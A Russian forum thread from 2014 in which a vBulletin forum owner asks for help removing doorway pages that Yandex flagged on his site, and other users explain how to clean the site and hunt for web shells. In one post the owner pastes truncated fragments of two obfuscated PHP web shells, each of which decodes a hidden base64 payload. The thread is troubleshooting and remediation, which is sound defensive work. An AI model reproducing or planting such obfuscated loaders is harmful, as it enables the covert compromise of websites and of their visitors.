Как удалить страницы-дорвеи с форума?

креш · 31.01.14

Здравствуйте, помогите в решении очередной проблемы. в общем ситуация такая, яндекс прислал мне вот такое сообщение - Во время последнего посещения сайта наши роботы обнаружили на нем подозрительные страницы, похожие на дорвеи (страницы, единственной целью которых является перенаправление пользователя на другой ресурс). Вот некоторые из обнаруженных страниц:
мой_сайт.ru/community/compaq-presario-cq57-381sr-drayvera.php
мой_сайт.ru/community/dwa-140-drivers.php
мой_сайт.ru/community/radeon-x1300xt-drayver.php

Что бы удалить эти страницы, нужно в корне форума из папки community удалять compaq-presario-cq57-381sr-drayvera.php ? Или не так, помогите пожалуйста!

Wmboard · 31.01.14

Это что за движок?
Чтобы дать ответ нужно посмотреть сами страницы.

креш · 31.01.14

vBulletin 4.2.0 Страницы какие ? Самого сайта или страниц которые Яндекс нашёл?

Wmboard · 31.01.14

Те, который вы давали в первом посте. Они есть в дистрибутиве? Или это уже сгенеренные страницы движком?

креш · 31.01.14

У меня нет дистрибутива, проверить не могу.

Льюви · 01.02.14

Папки community в дистрибутиве 4ки нет

креш · 01.02.14

Льюви спасибо большое, я так и думал что её там не было! Удалять её из корня полностью? Да?

Льюви · 02.02.14

креш написал(а):
Удалять её из корня полностью? Да?

ну как я могу ответить...
если её не ставил как-то хак, если она не была создана администратором для каких-то целей - да, удалять
но этого мало: надо искать, через что залили
надо искать шелл (он может быть не один) и уязвимость
+ прогнать собственный комп несколькими антивирусами

креш · 02.02.14

Эту папку я удалил, Яндекс.Вебмастер при проверке браузерного вредоностного кода пишет - "Вредоносный код на сайте не обнаружен", теперь нужно как-то серверный вредоносный код поискать. :sorry:

креш · 09.02.14

Вот проверил Айболитом он выдал что сайт содержит 714 шелл-сигнатур, а также 272 других вредоносных фрагментов, что дальше делать?

Wmboard · 09.02.14

Смотреть каждый из файлов, и если это файлы дистрибутива то заменять оригинальными. Если нет, то смотреть что это за файл и уже потом принимать решение.

креш · 09.02.14

Кто-нибудь видел эти шеллы? Вот это шелл
<?php $_f___f='base'.(32*2).'_de'.'code';$_f___f=$_f___f(str_replace("\n", '', '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

ИЛИ ЭТО - <?php
$fZxUS="\142\141";$ERzjDP_="\163\145";$EyhsA="\66\64";$srdz="\137\144";$rAnJbB="\145\143";$myEPx='od';$YLZUqor="\145";$XWTjB=$fZxUS.$ERzjDP_.$EyhsA.$srdz.$rAnJbB.$myEPx.$YLZUqor;$pRoFmOb='BxyMV8seCnR=X61Kaw9PkEu5hz4i';$ImtC='GATjf32qgoINvF0YHZcJbmLQUOtDSrWlpd';$DFLe=$pRoFmOb.$ImtC;$ceirjV='H:slu$o{\'cxh}i?AE&wyMFq(D5ZJLgTR.2vOd1GWprt4,Xm/z~3I_K`P!860[a';$ZjfV=$ceirjV;$XktWEy='X}XDz\'DJ4}W0WRx.XLuRzvx0A\'/E6F[(4RWAX~W`ucaJlt1&4um?zM`FI}Hy{u/1XrD!z?d5I';$akOwS='~DRlt?c_rWHE_?`x}[Wu?F&T6[6zu0O_~DKutX866[EE00`6}DWE0[1TMaKzrMs!~`yuF?[T2apE?';$SXdUNHu='MsK}WJlt0c_rWHE_Ms_~?K_tM2Iv0!E?[}6';$eTWa='~DMu2d&6P/LE~x,z,XJE_F(!_WMxvr}{L:RlPr14~0RWtW[_~`Eu?[1XraZlrd5uc[';$zjTXBq='EuR0146?LWF0FlLaM!F1';$hFnDqj=':60x5!t[,_~:Ez_4:4MD!X0MsELDRzM(oXFWH';$YHZf='K_0PXrDDu5u84RWM{M:_x}0KuFuqT2a&avW`u~';$bCDcTnA='(4lt[o4taZErMsu6w/ETD?!vM(zF0[av04!LmsT0XZWF(i6~W0xr0Z6FDcl0F:{PxWE~DRX_xXl?';$QiGks='DGX5WxucdtT~[o4vuF6MX4!LmsT~:ZWF(8T~W0xr0Z6FDclt(L{PxKE0XRX_x/WrDGX5/Wz,dtT~[L4vuF42[4!LmsT0XZWF';$JHxW='?i6~W0xFt&6FDclu/o{PxKE0/RX_xXluDGX5/Wl}dtT~`E4vuF6TH4!LmsT0XZWF?OXv(Kl6aZ4v?uW6Wi!RXllr/?T';$IZbp='?XEE~Isl}rEz,HZ!5r\'60XG_RrKlt?(urm?Eru_uRHWz}Hu4taKlu15IT/EuM/345G:WLW`arxWuM/sXr_?m04s6TWKlFt';$IvhGFzu='&_T/t_?/4xRuKxF(_Tc[WWrxOxR/Xz0X`4txMx?WuuM/uE2Hs_uXAI?ruEruKlvDTu~t?T?W}{PrDur/Xu,[EEtZ&mPxK{M';$njpjZ='[u_}M(_uxO!~`Ju6dv46?2Wr[,!~rE';$lkDYM='E~ItT6?!ar[FzF:TzLD[_tuKlruLxMxXzL:/X6?&z0l:Xr[MxcH!uRH!';$NOBf_DL='E?/`K,[}!r[:TPWM!ul:IM(DE?[yXL`Mm~uqXPxll?[u4c[L';$awRAviN='EtosEF?yut(ZT6o:xtw4_Mxyu?/quFxca0G&aFwEuLm&uLM(m6W4ErWJxF/x_0atlr';$CULuO='xOuR/Xu}DsTtuL4u[ru~r6l}H\'!5H2l6WG!M`TltZ56MX!u6uTKPr0x0/yXL[c{6u6X,xWx6$t4';$yUXlmvR='5WR{r/qEF(EzT0/utm(6r/FIcuTlr[WXrXM{F?6T~rX{}xZX6[omru8X5W!E';$TfFVe='~:`X6(Al6/66MxMz_?suL`MuuaLzrrl{~&&XuDc{_(,W6`Tl,x&T~:Lurr8X2[uuLD`T6`K6LrOX5HuxuG5_0DLWua6I0X!!r';$nwaY='X4_tX&{6/4xTr}6L:i40xxl6uO_TuDzrG?u_X1!6/`T~(E';$JoMGOW='xT0!_?uKE~x}lTXKxLxs46o?W6W8XLDulPu(TM_?{r[LIT/EI2l:_?XKE?au_ca!lL';$LaCQoN='x3TR/AEM&5!Rr!lPu(T?xEzuui_M/KEMF5u_X!zM';$NbzO_dk='osX,[Xut_?6TW\'W~riT~?6Ev:,Tux1T0xrXF?WuT0W!5/!!LIsmF/u6,Hl4_aZ!';$XZIoW='u1:_c/_xM/F4R/!_r4&TRXuuM(F_~`8lr/6_0u}uTFv6TWKT0xuEru3l}HiTtDKx0/4EFW_ltX44uxA_r[oT}[';$rtSQuVW='xu6x&XPr\'T_&:mLwJl0[x4_Wt_uuul}xxl,HuuL[Au0r6_M:!l2HO';$cKtbq='TTWpWFZsl_/ME?M&uvt?x00}xTH!z_[xuu';$ohGI='XHa0uuX5WRz6:A4_X\'E?M5I}0D!F(\'_v(Klvu_TM(TxrF:u?_?W0I&xMXKl6`(!5Hcl';$uDiILyq='LuozPuTu5rG6~(rWF?_EL[_lRDv6TH6TLxiuc/EE~:p4tDKlvuFx0rRxvDGuFaAmr[rK6D0u}H_T6?!z00_E';$OLnS='LD3{M[t4_xL_Lx4mF/yxLxy4v(oavriXF?XE2D`uL[';$zjEa_='o{0a}x0[Jl6`vu0uM6u0OIM/JxuFt4txK!Mw46}aREv:l4tDMI?[FxRX6xcHy_MD!_rlszL[ux0Xy_R/ZaF';$fraZOdE='(,!c0TuTrGuPH&WLr(a,WJu0/1uL?1It(`l6wyx~:Kur_ta?u[m5HJEMu(';$dBefR='u?XM!0IsTMuuxLWsuR/!6rWLI0DEu~$?_v?Au0W4uM:uuv:IuruXWu/,lTuxzM(v_Ma66ulsxcHJz}xlu~:&E~F:!0D_x}Hi';$TNoAZ='XPWExuxoX2/llu/866`Ka?l5_ca_l~DWu6?Zu_?rx}[xEtM:_tDXm0/rKu[';$jmujbO='Rxu/\'_~[1x?XPm5x3l0/\'T0X\'mF?6EPu3lt(56uDHWLu,TTxEx6x&u6:XWrarEFW__2xr_6?c{';$FqhUBW='~/qx~wTuFXx_c[MzM?`aFa!u}x(Tc[K_?G5TMDxEtXG4}[KTur6uTW_xT0,u~o';$vfBD=':auaouMXRzM(uTMX!IMosTcHuE~:LTRG?z?r4TT/ll_XOT__:T6/Gx0D_lL';$NjiqjI='DIXFXLlt(}6M`uz_1?_~t(_M&5z20KuLWZ_0uAuur__MaEuM[}T~?K_6W,m2[REM/2u?x8l?x,l_WJxvxq4c[1m~WL_';$BPKz='M/Wx~x[4ua/{uX}ucDxlRus_tuZ_6lsl_a6l6D,TR/ozLW`K_Dl{~D!6RHKEM(_uc/xz~:A_6?Mxt&:E';$HMPvN='PWxlMt:TMD&a?[F!cxWuM[suru1xFt&XF`J';$ZaIt='{0[?uuu/mM&&Tcauz}x,_~[A{6W8_}/Mu6xtXL[\'a0[uTMxK{M[xu~[o{_?6TM/0x?/F6ua6m?/uX2DME~DIT0';$tUCMBeD='D6ut?L_M/Tx~x\'XuDxavF56}0Tu6xE6MD6!rxr6~`_EM(r45WoIMw4uMuExcHZurDMTM(8';$dMsXEU='EL`M_2l5TMxulvu8luXy6FXr_?X&';$Aielydz='u6xux00R{0[8_6`L!Ll&mr/MlFX3Xua!4uF5_cr}z}H1T?x\'x0x8TTWyxv`sT6:HmM`iXL(JI2xX_5WrW';$ChLaZm='uriI0/M{~l?_R/A_rr}u~DKx?/P4MaZm6rPK_(uE2dv4MxAa~r8TRuT6F[D4?a&6rxoE20xz0[GXPHp{';$VLUdTtr='6IsaL(6x~D(Xrx\'m~F&_Mx0u0[s_6?/l?/,W}/xu0_&66(!{uX8zPuXlMt?urx\'46';$uUJRSz='r[aPu_zLo5_v(1I~u}!TuWzTuT4~t';$hHVLA=':E_(_E5x}u6x`_?xLm6u8{FxDucH\'_uuM60Ms6MDxuLxTu';$EsTwx='_xHavl&mFWTlR_:T?_(zrWoI0[J6rX}T0uAmLx8';$DjuLA='z5/6xvD?_Rg(!vx_ErXT{MMs6c[\'!vl:zL[}zu[860u!lrXGzFxXz_X\'uFa1!0Xul,DJx';$dSVCRPQ='~xW_taA{6rO60/WEM/,6uDAa~Is60[XlP08_Mxo_uu';$OCTen='__~DWlR01u6o&luWi_c[xlF[[XL:K4_?rzruXzFX?X6?1murulu0TzTuITu_tW6r`';$KMhwBNG='T~0MlF(T6RWLW_Z&_RrDxF(ZTT/tau1:x}[';$PLoz='3lLW(_?l(_?X8mrx}z6DKXuar{~lszPxKu5r?TMxLE0[6!~wllM4?6Tg(avu}uc';$vlPx='/uu_1?4Ma1m6W_X,H_!F(rT0aAa';$fRxwrjc='uX,zPWTxtuZuRGt{r45!';$OYpdzFo='0a6l~d:_RH&E?xqzPr}!L:ruruEu0W,aLr!x}H\'XuXM!~WuXL:Tu~x/XPr\'uru`m2auxu/T4v[Mzvr`l,0XEtX\'4TH&lvW_I';$_sLnu='}0xzMF5_MxcWL/u_Rxu{M/y_uX1zvWOu~r}zu/ZXu';$OdrIkip='xLWrX_!M`3l2g5_?xA_M&:6cuEE~`2_6?MI?r__0[K_50EXL[RlurO6~rDzcHt4MxrWu';$xfnoG='W_!RX0xF/E4?u&6uWq!0rEuvl5T6?&l?Fs!MuJEttsTP/EIM&s{,X6uT0__5WK_rW_uM:Eu6DFu?m(z';$_GPQ='t(PK_:R!F(i45r!mM?L6MaRx6DT_6:eek:l6I&lu[uE2DrXuDXlLI&KuxRxF/!4Muo6';$WZfi='LuGzrrT6L:su~`&a?uL6~wy6LmsuPHZT?M&a5WTut(2u0x!I0X';$zvNuG='GX,rTu~:/

Это они не полностью, так кусочки.

креш · 18.02.14

Всё это время мучился с этими шелами, сегодня скачал чистый дистрибутив и проверил его айболитом и получил то же самое что и при проверке своего форума. Текущая база скрипта содержит 714 шелл-сигнатур, а также 272 других вредоносных фрагментов. Что это значит? Дистрибутив уже заражён?
Кстати папку community я удалил из корня и перенёс в комп, открыв её в компе там оказались картинки, аватарки!
А Яндекс.Вебмастер продолжает слать эти сообщения : Во время последнего посещения сайта наши роботы обнаружили на нем подозрительные страницы, похожие на дорвеи (страницы, единственной целью которых является перенаправление пользователя на другой ресурс). Вот некоторые из обнаруженных страниц:
avto-.ru/community/3com-etherlink-xl-10-100-pci-drayver.php
avto-.ru/community/i-sensys-mf4010-drayver-skachat.php
avto-.ru/community/showforum-8-2.php
Только как, я ведь удалил папку community? Уже нет мыслей что делать.

Льюви · 19.02.14

креш написал(а):
Что это значит? Дистрибутив уже заражён?

айболит страдает некоторой параноидальностью, это факт... где-то я об этом уже говорила
откуда брали дистрибутив?

креш написал(а):
Только как, я ведь удалил папку community?

это как раз нормально, Яндекс что-то обрабатывает из собственного кеша
погодите, вот ещё они напару с Гуглом начнут слать письма про "увеличение 404", угу, угу...

А что там было вообще, на этих страницах? фейк фкантакта или "мой мир"?
.хтаксесс в этой папке - был? если да - какой?

креш · 19.02.14

откуда брали дистрибутив?

https://lumtu.com/vbulletin-4-x-x/3822-skachat-vbulletin-4-h-x.html
При переходе по страницам был какой-то форум, кажется связанный с комп программами. Но при этом на их форуме отображался мой favicon.
.хтаксесс имеете ввиду в папке community?

Льюви · 19.02.14

креш написал(а):
При переходе по страницам был какой-то форум, кажется связанный с комп программами.

понятно
скачать что-то за смс... :D

креш написал(а):
.хтаксесс имеете ввиду в папке community?

да

Wmboard · 19.02.14

креш написал(а):
А Яндекс.Вебмастер продолжает слать эти сообщения

Ну так и должно быть. Яндекс ведь моментально реагирует только на заражение, а на лечение не спешит :) В вебмастере вроде должна быть "заказать перепроверку".

креш · 20.02.14

В папке community .хтаксесс небыло.

креш · 21.02.14

Так что, пока не обращать внимание на сообщения от Яндекса?

Льюви · 23.02.14

креш написал(а):
Так что, пока не обращать внимание на сообщения от Яндекса?

/community/ - в роботс.тхт
в панели вебмастера поотправлять запросы на удаление этих страниц из индекса и из кеша

креш · 23.02.14

Понял, спасибо!

Как удалить страницы-дорвеи с форума?

креш

Wmboard

креш

Wmboard

креш

Льюви

креш

Льюви

креш

креш

Wmboard

креш

креш

Льюви

креш

Льюви

Wmboard

креш

креш

Льюви

креш